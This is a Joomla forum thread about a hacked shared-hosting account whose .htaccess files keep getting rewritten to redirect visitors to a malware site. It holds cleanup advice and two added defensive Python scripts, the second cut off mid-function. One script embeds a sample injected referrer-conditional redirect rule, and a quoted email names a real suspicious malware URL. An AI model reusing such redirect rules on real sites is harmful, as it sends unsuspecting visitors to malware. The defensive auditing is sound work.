The Joomla! Forum ™



 Post subject: htaccess hacked
PostPosted: Fri Mar 23, 2012 10:51 am 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
Problem Description :: Forum Post Assistant (v1.2.0) : 23rd March 2012 wrote:
301 htaccess hacked
Log/Error Message :: Forum Post Assistant (v1.2.0) : 23rd March 2012 wrote:
redirected to hand-poise.xx
Forum Post Assistant (v1.2.0) : 23rd March 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 2.5.3-Stable (Ember) 15-March-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Writable (644) | Owner: 6938709 (uid: /gid: ) | Group: 100450 (gid: ) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.19.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /var/chroot/home/content/09/6938709/html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 32M | Max. POST Size: 33M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.92-log (Client:5.0.77) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 32.70 MiB | #of _FPA_TABLE: 202
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | SPL (0.2) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | pspell () | Reflection (0.1) | standard (5.2.17) | mysqli (0.1) | soap () | SQLite (2.0-dev) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | cgi-fcgi () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): Maybe
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered :: wrote:
Templates :: SITE :: rt_gantry (3.2.16) | rt_camber (1.3) | mobile_iphone (1.0.2) | mobile_imode (1.0.2) | mobile_wap (1.0.2) | mobile_smartphone (1.0.2) | beez_20 (2.5.0) | beez5 (2.5.0) | atomic (2.5.0) |
Templates :: ADMIN :: hathor (2.5.0) | bluestork (2.5.0) |


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 11:17 am 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
Please do an extended version of the FPA with the extensions listed.
Run through checklist 7 as linked from the "before you post read this" sticky.
What is your host?

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 11:22 am 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
Godaddy shared hosting


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 11:30 am 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
Forum Post Assistant (v1.2.0) : 23rd March 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 2.5.3-Stable (Ember) 15-March-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: 6938709 (uid: /gid: ) | Group: 100450 (gid: ) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.19.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /var/chroot/home/content/09/6938709/html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 32M | Max. POST Size: 33M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.92-log (Client:5.0.77) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 32.73 MiB | #of _FPA_TABLE: 202
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | SPL (0.2) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | pspell () | Reflection (0.1) | standard (5.2.17) | mysqli (0.1) | soap () | SQLite (2.0-dev) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | cgi-fcgi () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Database Information :: wrote:
Database _FPA_STATS :: Uptime: 1308239 | Threads: 3 | Questions: 48265586 | Slow queries: 65 | Opens: 59873 | Flush tables: 1 | Open tables: 9248 | Queries per second avg: 36.894 |
Extensions Discovered :: wrote:
Components :: SITE :: WF_XHTMLXTRAS_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_TABLE_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_YOUTUBE_TITLE (2.0.21) | com_wrapper (2.5.0) | com_mailto (2.5.0) |
Components :: ADMIN :: K2 (2.5.4) | com_finder (2.5.0) | RokModule (1.3) | VirtueMart_allinone (-) | VirtueMart (-) | ECB Currency Converter (1.0) | Gantry (3.2.17) | Admintools (2.2.2) | Mobile Joomla! (1.0.2) | JCE (2.0.21) | Editor - JCE (2.0.21) | Unknown (-) | Fox Contact Joomla 1.5 (-) | COM_FOXCONTACT (2.0.13) | Akeeba (3.4.3) | com_xmap (2.2) | com_weblinks (2.5.0) | com_users (2.5.0) | com_templates (2.5.0) | com_search (2.5.0) | com_redirect (2.5.0) | com_plugins (2.5.0) | com_newsfeeds (2.5.0) | com_modules (2.5.0) | com_messages (2.5.0) | com_menus (2.5.0) | com_media (2.5.0) | com_login (2.5.0) | com_languages (2.5.0) | com_installer (2.5.0) | com_cpanel (2.5.0) | com_content (2.5.0) | com_config (2.5.0) | com_checkin (2.5.0) | com_categories (2.5.0) | com_cache (2.5.0) | com_banners (2.5.0) | com_admin (2.5.0) |

Modules :: SITE :: K2 User (2.5.4) | K2 Users (2.5.4) | K2 Tools (2.5.4) | K2 Login (2.5.4) | K2 Content (2.5.4) | K2 Comments (2.5.4) | mod_finder (2.5.0) | Easy Stock Ticker (1.0.0) | RokStock (1.3) | mod_virtuemart_search (2.0.0RC3) | mod_virtuemart_product (2.0.0RC3) | mod_virtuemart_manufacturer (2.0.0RC3) | mod_virtuemart_currencies (2.0.0RC3) | mod_virtuemart_category (2.0.0RC3) | VirtueMart Shopping Cart (2.0.0RC3) | RokNavMenu (1.7) | Markup Chooser (1.0.2) | Mobile Menu (1.0.2) | Header (1.0.2) | ITPFacebookLikeBox (1.2) | Fox Contact (2.0.13) | mod_wrapper (2.5.0) | mod_whosonline (2.5.0) | mod_weblinks (2.5.0) | mod_users_latest (2.5.0) | mod_syndicate (2.5.0) | mod_stats (2.5.0) | mod_search (2.5.0) | mod_related_items (2.5.0) | mod_random_image (2.5.0) | mod_menu (2.5.0) | mod_login (2.5.0) | mod_languages (2.5.0) | mod_footer (2.5.0) | mod_feed (2.5.0) | mod_custom (2.5.0) | mod_breadcrumbs (2.5.0) | mod_banners (2.5.0) | mod_articles_popular (2.5.0) | mod_articles_news (2.5.0) | mod_articles_latest (2.5.0) | mod_articles_category (2.5.0) | mod_articles_categories (2.5.0) | mod_articles_archive (2.5.0) |
Modules :: ADMIN :: K2 Stats (admin) (2.5.4) | K2 Quick Icons (admin) (2.5.4) | mod_version (2.5.0) | Admin Tools Joomla! Upgrade No (2.2.2) | Admin Tools Joomla! Upgrade No (svn746) | Mobile Joomla! CPanel Icon (1.0.2) | Akeeba Backup Notification Mod (3.4.3) | mod_toolbar (2.5.0) | mod_title (2.5.0) | mod_submenu (2.5.0) | mod_status (2.5.0) | mod_quickicon (2.5.0) | mod_popular (2.5.0) | mod_multilangstatus (1.7.1) | mod_menu (2.5.0) | mod_login (2.5.0) | mod_logged (2.5.0) | mod_latest (2.5.0) | mod_feed (2.5.0) | mod_custom (2.5.0) |

Plugins :: SITE :: plg_quickicon_joomlaupdate (2.5.0) | plg_quickicon_extensionupdate (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_content (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_categories (2.5.0) | plg_captcha_recaptcha (2.5.0) | VMSHIPMENT_WEIGHT_COUNTRIES (2.0.0RC3) | VMPAYMENT_PAYPAL (2.0.0RC3) | VMPAYMENT_STANDARD (2.0.0RC3) | VMCUSTOM_STOCKABLE (2.0.0RC3) | VMCustom - specification (2.0.0RC3) | VMCustom - textinput (2.0.0RC3) | Mobile Joomla! Ad Remover (1.0 RC) | Mobile - TeraWURFL (1.0.2) | Mobile - Domains (1.0.2) | Mobile - Forever (1.0.2) | Mobile - Simple (1.0.2) | Xmap - Mosets Tree Plugin (2.0.2) | Xmap - SobiPro Plugin (2.0.1) | Xmap - Kunena Plugin (2.0.2) | Xmap - Content Plugin (2.0.3) | User - K2 (2.5.4) | plg_user_profile (2.5.0) | plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | System - K2 (2.5.4) | plg_system_languagecode (2.5.0) | plg_system_highlight (2.5.0) | System - RokExtender (1.0) | System - Gantry (3.2.17) | Akeeba Backup Lazy Scheduling (3.3) | System - EasyCalcCheck PLUS - (1.6-2) | System - Admin Tools (2.2.2) | Abivia.net Redaction Utility (1.1.2) | Mobile Joomla! (1.0.2) | System - JCE MediaBox (1.1.1) | System - ByeByeGenerator (1.3) | plg_system_sef (2.5.0) | plg_system_remember (2.5.0) | plg_system_redirect (2.5.0) | plg_system_p3p (2.5.0) | plg_system_logout (2.5.0) | plg_system_log (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_debug (2.5.0) | plg_system_cache (2.5.0) | System - Admin Tools Update Em (1.0) | System - Joomla! Update Email (1.0) | Search - K2 (2.5.4) | plg_search_virtuemart (1.5) | plg_search_weblinks (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_content (2.5.0) | plg_search_contacts (2.5.0) | plg_search_categories (2.5.0) | plg_extension_joomla (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_article (2.5.0) | Editor - JCE (2.0.21) | plg_editors_tinymce (3.4.7) | plg_editors_codemirror (1.0) | plg_content_finder (2.5.0) | plg_content_vote (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_joomla (2.5.0) | plg_content_geshi (2.5.0) | plg_content_emailcloak (2.5.0) | plg_authentication_ldap (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_gmail (2.5.0) |
Templates Discovered :: wrote:
Templates :: SITE :: rt_gantry (3.2.16) | rt_camber (1.3) | mobile_iphone (1.0.2) | mobile_imode (1.0.2) | mobile_wap (1.0.2) | mobile_smartphone (1.0.2) | beez_20 (2.5.0) | beez5 (2.5.0) | atomic (2.5.0) |
Templates :: ADMIN :: hathor (2.5.0) | bluestork (2.5.0) |


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 3:35 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
Finally got the sites stable by inserting a generic htaccess file and immediately changing the permissions to 444. One that had crashed, I was able to restore with an Akeeba backup. But one will not restore; the script is interfering with the installation phase of the restore.

Looking over several domains, I was able to see that the files were injected into each folder at the same time, an hour apart, each hour. Not sure if it is coming from within my partition or across the shared server. GoDaddy. I changed all passwords and logins and scanned my PC. Confident the script resides within the server.


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 5:46 pm 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
Ask on the GoDaddy forums if anyone else has the same issue.

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 7:20 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
Nothing on the GoDaddy forums was helpful.

I do have two accounts, each has about 20-30 sites. One is totally clean, the other dirty. On the dirty one, every site folder root had this corrupt file in it.


 Post subject: Re: htaccess hacked
PostPosted: Fri Mar 23, 2012 7:35 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
I thought I had them locked down, but the htaccess files that I had inserted and changed the permissions to 444 on were rewritten again.


 Post subject: Re: htaccess hacked
PostPosted: Sat Mar 24, 2012 12:58 am 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
Then there is possibly a root type script (c99 and r57 are just two; there are many more) on the server, or one or more of these scripts on your sites, that is allowing the hacker to sit at his computer and do as he wishes (server and all sites show up as a drive on the hacker's computer; no passwords needed) with your sites/domain(s) or with the server. There could also be a cron job set up to make certain hacking edits/additions to your site.

You need to inform your host of the issues you're having and the possibility of a root type script on the server. Just asking a host about a hacking issue with their servers will get nowhere. They will give a standard boilerplate answer of nothing is wrong with our stuff. This is what you already got in response, so don't ask; tell them there is an issue and a possible root kit installed on the server somewhere and they need to check their server for one. Certain hosts have had this issue a number of times in the recent past.

You're going to have to password protect the public_html directory of every domain and/or site under your account to start with. This may slow down or possibly stop the issue if it is an external access until you can fix it properly.

You must go through every site and delete every file and replace every file with known good ones, as the first point below and security checklist 7 suggest. You should also check for cron jobs running that assist in the hack, and you should make sure anonymous FTP is not enabled.

[ ] Delete all files and directories in your Joomla installation area which would be your public_html directory. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted in files and directories and/or any added files or directories (which may or may not be hidden within legitimate directories) not associated with your site.

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777; the ideal is 644 and 755.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous FTP enabled.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
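Added example, not code from this thread or from Joomla, for the checklist item above about odd code in .htaccess. The Python below parses each directive of an .htaccess and flags the hijack shapes reported in this thread: a RewriteRule that sends visitors to a host other than the site's own, with a note when the preceding RewriteCond lines key on HTTP_REFERER or HTTP_USER_AGENT (the redirect that fires only for visitors arriving from a search engine), an ErrorDocument pointing at an absolute off-site URL (a redirect tied to error responses), and plain Redirect directives to another host. The hostnames in SITE_HOSTS, the malware.invalid target and both sample .htaccess texts are constructed for the example; CLEAN only has the shape of the SEF block in Joomla's htaccess.txt and is not a copy of it.

```python
"""Audit .htaccess files for off-site redirects, conditional or not."""
import os
import re
from urllib.parse import urlparse

# Assumption for the example: the audited site's own hostnames. Any absolute
# redirect target on another host is reported.
SITE_HOSTS = {"example.com", "www.example.com"}

# Conditions keyed on where the visitor came from or what browser they use.
# Hijacks use these so the owner, typing the URL directly, never sees the
# redirect while search-engine visitors do.
SUSPECT_COND = re.compile(r"%\{HTTP_(REFERER|USER_AGENT)\}", re.IGNORECASE)
ABS_URL = re.compile(r"^https?://", re.IGNORECASE)


def is_external(target, site_hosts=SITE_HOSTS):
    """True if target is an absolute URL on a host that is not one of site_hosts."""
    if not ABS_URL.match(target) or "%{" in target:  # %{HTTP_HOST} etc. stay local
        return False
    host = (urlparse(target).hostname or "").lower()
    return host not in site_hosts


def audit_htaccess(text, site_hosts=SITE_HOSTS):
    """Return [(line_number, reason, directive_line)] for every suspect directive."""
    findings = []
    pending_conds = []  # RewriteCond lines that govern the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond":
            pending_conds.append(line)
            continue
        if directive == "rewriterule" and len(parts) >= 3:
            if is_external(parts[2], site_hosts):
                conditional = any(SUSPECT_COND.search(c) for c in pending_conds)
                reason = ("referrer/UA-conditional redirect to external host"
                          if conditional else "redirect to external host")
                findings.append((lineno, reason, line))
        elif directive == "errordocument" and len(parts) >= 3:
            if is_external(parts[2], site_hosts):
                findings.append((lineno, "ErrorDocument points off-site", line))
        elif directive in ("redirect", "redirectmatch", "redirectpermanent"):
            if is_external(parts[-1], site_hosts):
                findings.append((lineno, "Redirect to external host", line))
        pending_conds = []  # any other directive ends the RewriteCond group
    return findings


def audit_tree(root, site_hosts=SITE_HOSTS):
    """Audit every .htaccess below root (e.g. a whole shared-hosting account).
    Returns {path: findings} for files with at least one finding."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = audit_htaccess(fh.read(), site_hosts)
            if found:
                hits[path] = found
    return hits


# Constructed samples. CLEAN has the shape of the SEF block in Joomla's
# htaccess.txt; INJECTED appends the kind of redirect the thread describes.
CLEAN = r"""
# Joomla! SEF section
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/index\.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule .* index.php [L]
ErrorDocument 404 /error.html
"""

INJECTED = CLEAN + r"""
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC]
RewriteRule ^(.*)$ http://malware.invalid/in.cgi?7 [R=301,L]
ErrorDocument 403 http://malware.invalid/in.cgi?7
"""

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("injected", INJECTED)):
        print(name, audit_htaccess(sample) or "no findings")
```

Point audit_tree() at the account root to sweep every domain directory at once. Every target in the stock htaccess.txt is relative, so a clean Joomla site produces no findings; anything listed is either a redirect the owner added on purpose or an injection, and the conditional variant is the one that hides from an owner who only ever types the URL directly.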


 Post subject: Re: htaccess hacked
PostPosted: Sat Mar 24, 2012 1:56 am 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
It appears to be a root script. Following your suggestion, I called the host back again.
They would do nothing without me buying something, so I bought the virus scan.

I received an email a couple of hours later telling me they had found "Warning or Critical Issues on your website".

The email provided a link which told me how I could talk to a rep about paying to have the issues explained to me. Passing on that one. Not going to fill white space complaining about having an issue in the root fixed.

I have not had a new incident in 7 hours.

Time for a dedicated server.


 Post subject: Re: htaccess hacked
PostPosted: Sat Mar 24, 2012 2:37 pm 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
I would suggest you investigate other hosting service companies if you're looking to make an upgrade to dedicated. A good place to research and ask questions is on Web Hosting Talk http://www.webhostingtalk.com/

Typically, in some situations, what happens is a vulnerability in a website is exploited and what is called a 'root kit' is installed. This kit can be as simple as a single but very powerful script that gives the hacker the ability to access the account under which it is installed without needing any passwords or usernames. On some hosting services, including some very popular ones, security is not all that good and the script can easily gain access to the rest of the accounts installed on the server without needing usernames/passwords and can also gain access to the 'root' or underlying software of the server, also without needing usernames or passwords.

So, I would still consider replacing files within each site with known good ones or freshly downloaded ones, and I would also think about following what I posted above and check for cron jobs etc. that you did not create. I would do this even if there are no more issues and I would also do this if you decide to go dedicated. You don't know if the sites are in fact clean or if there are backdoors dropped within the site(s) somewhere that will allow later easy access to a hacker. Joomla consists of hundreds of directories and thousands of files. It is very easy to miss a few bad files/directories even when using an "anti-virus script", especially since the script is not tailored to any individual site and tends to depend upon certain assumed parameters for detection.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


 Post subject: Re: htaccess hacked
PostPosted: Sat Mar 24, 2012 8:55 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
The reason I have stayed with shared hosting is that I am not comfortable with my technical knowledge on the server side, and my company size and income on hosting does not provide for me having more tech help. Safer, faster shared hosting is ideal for me at this point, as all I do is build and set up sites. I tried virtual hosting and was very unhappy with the speed. It was in fact slower than one of my shared hosting accounts.

I will take your advice and begin replacing everything on this server as I bring them back up. Just very thankful that I had kept two hosting accounts and am only having to repair half. Thank you for your assistance; saved my butt.


 Post subject: Re: htaccess hacked
PostPosted: Sat Mar 24, 2012 10:28 pm 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
VPS is in fact often much slower than shared.

Managed dedicated is one way to go dedicated but still have certain aspects, such as server software updates, managed for you. There are various levels of this, and this is not VPS. You get the whole server. Watch the amount of memory though; more is better.

Shared is OK most of the time if you find a good host. Notice I did not say popular, expensive or cheap host. Do research on places such as Web Hosting Talk that are likely to tell the truth about their hosting service selection and experiences with them.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


 Post subject: Re: htaccess hacked
PostPosted: Sun Mar 25, 2012 3:58 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
As I have been cleaning, I have received a couple of emails from GoD.

Quote:
Description:

The following url, found in your site's content, has been identified on Google Safe Browsing as a suspicious url: general‑station.ru/in.cgi?7

The suspicious URL is on the following pages:

- balxxxxxxxxxxnet.net/icons

Risk Type:

Malware


I replied that I did not have a sub with that name.

After I had allowed a directory listing, I see that this is the images folder for the server.
I realize that access could have been allowed through my content, but the script is beyond my reach.

I have had this page come up a couple of times as I have been working. It comes up only in Firefox, not Internet Explorer. It seems to be associated with error responses.

BTW, I have no cron jobs. I have the errors going to a very simple error.html page.


 Post subject: Re: htaccess hacked
PostPosted: Sun Mar 25, 2012 4:59 pm 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
See my post above for what you should be doing: viewtopic.php?f=621&t=705221&p=2773573#p2772744

OK, as I understand from previous messages in this thread, you are on a shared hosting account with your selected host service. Since you have so many sites you may have a reseller account to manage them. Now, I fail to understand why you think you do not have access to certain parts of your domain/site. If you have a reseller account then you have access through that to every account, and probably also by FTP, as each domain/site under your account is really just a directory. If it is just a regular shared account with unlimited domains or something to that effect, then each domain is again basically just a directory and accessible from the main account and from FTP.

It is very common to place code within established directories such as the images directory in a Joomla install, and it is one reason why you should be following the checklist. On shared hosting you will not be able to see or even check what is within directories outside of your master account(s).

The script does not have to be residing on the server someplace out of your reach to infect all of your sites on your account. From my understanding of previous posts, all of your sites are controlled by your two master accounts. One of these accounts (the dirty one) has a site that was originally infected and hacked. The hack script placed there on that original site has replicated itself to all other domains/sites within that master account. They did not need any type of password or user name to do this. This is called cross site contamination and is very similar to cross site scripting, the difference being cross contamination is localized to an account and the domains within that account, and cross site involves different accounts on the server affecting all domains within each account. Cross contamination is generally your problem and cross site is your host's problem. Think of a reseller as a mini-host. You're hosting those 40-60 sites and by doing so you are accepting some of the responsibility and should know how to fix things easily and quickly within your master accounts.

Each of the domains you have will have their own access to cron and each domain needs to be checked.


Quote:
The following url, found in your site's content, has been identified on Google Safe Browsing as a suspicious url: general‑ station .ru /in.cgi?7

This is a redirect to the malware site. The site this is on is likely being redirected to the malware site.

Hackers can install complete domains and/or sub-domains on a site and serve whatever they want from there. This will show in the logs and in traffic reports, but you have to read them. You should also be familiar with the normal content of your accounts.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
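Added example, not the thread's or Joomla's own code, for the account layout described above: one master account directory, one sub-directory per domain, everything owned by the same uid. The Python below (1) clusters the modification times of the .htaccess at the root of each domain directory, which makes the "every domain at the same time" pattern reported earlier in this thread visible and dates the first rewrite, (2) lists files changed in the 24 hours before that first rewrite, which is where the original foothold usually sits, and (3) counts the distinct file owners across the account, which is the reason a script in one domain can overwrite every sibling without a password. The account tree written by build_demo() and every timestamp in it are constructed for the example; the domain names are placeholders.

```python
"""Reconstruct how an .htaccess rewrite spread across one master account."""
import os
import tempfile
from pathlib import Path


def htaccess_mtimes(master):
    """{domain_dir_name: mtime} for the .htaccess at the root of each domain dir."""
    out = {}
    for entry in os.scandir(master):
        ht = Path(entry.path, ".htaccess")
        if entry.is_dir() and ht.is_file():
            out[entry.name] = ht.stat().st_mtime
    return out


def cluster_by_time(mtimes, window=120):
    """Group domains whose .htaccess mtimes fall within `window` seconds of the
    first member of the group. Returns [(first_mtime, [domains])] in time order."""
    clusters = []
    for domain, ts in sorted(mtimes.items(), key=lambda kv: (kv[1], kv[0])):
        if clusters and ts - clusters[-1][0] <= window:
            clusters[-1][1].append(domain)
        else:
            clusters.append((ts, [domain]))
    return clusters


def changed_before(master, ts, lookback=24 * 3600):
    """[(domain, relative path)] of files modified in [ts - lookback, ts),
    oldest first: candidates for the foothold that preceded the rewrite."""
    master = Path(master)
    hits = []
    for p in master.rglob("*"):
        if p.is_file():
            m = p.stat().st_mtime
            if ts - lookback <= m < ts:
                parts = p.relative_to(master).parts
                hits.append((m, parts[0], "/".join(parts[1:])))
    return [(d, rel) for _, d, rel in sorted(hits)]


def distinct_owners(master):
    """Number of distinct uids owning files under master (1 on typical shared hosting:
    whatever runs as that uid in one domain can write to all of them)."""
    return len({p.stat().st_uid for p in Path(master).rglob("*") if p.is_file()})


def _write(path, data, mtime):
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)
    os.utime(path, (mtime, mtime))


def build_demo(base):
    """Constructed account: three domains whose .htaccess were all rewritten at T,
    and a backdoor dropped into domainone five hours earlier."""
    master = Path(base)
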